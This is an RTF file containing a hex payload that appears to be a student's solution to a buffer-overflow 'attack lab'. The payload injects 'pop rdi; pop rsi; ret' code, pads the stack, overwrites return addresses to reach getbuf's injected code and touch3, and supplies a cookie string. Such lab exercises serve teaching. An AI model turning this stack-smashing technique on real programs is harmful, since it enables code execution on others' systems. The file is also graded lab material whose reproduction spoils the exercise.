{\rtf1\ansi\ansicpg1252\cocoartf2818
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 Menlo-Regular;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\csgray\c0;}
\paperw11900\paperh16840\margl1440\margr1440\vieww20240\viewh13800\viewkind0
\pard\tx560\tx1120\tx1680\tx2240\tx2800\tx3360\tx3920\tx4480\tx5040\tx5600\tx6160\tx6720\pardirnatural\partightenfactor0

\f0\fs22 \cf2 \CocoaLigature0 /* injected code */\
5f /* pop rdi */\
5e /* pop rsi */\
c3 /* ret */\
\
/* padding */ \
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\
\
/* return address: injected code */ /* comes from p /x $rsp in getbuf */\
68 5c 65 55 00 00 00 00 \
\
/* argument1 */ /* 0x55655c68 + 0x98 (120+32) */\
00 5d 65 55 00 00 00 00\
\
/* argument2 */ /* argument1 + 9 */\
09 5d 65 55 00 00 00 00 \
\
/* return address: touch3 */\
39 19 40 00 00 00 00 00\
\
34 39 32 62 32 31 36 37 00 \
ff 00 fc 00 01 01 fa 00 2a 01 fa 00 f9 00 fe 00}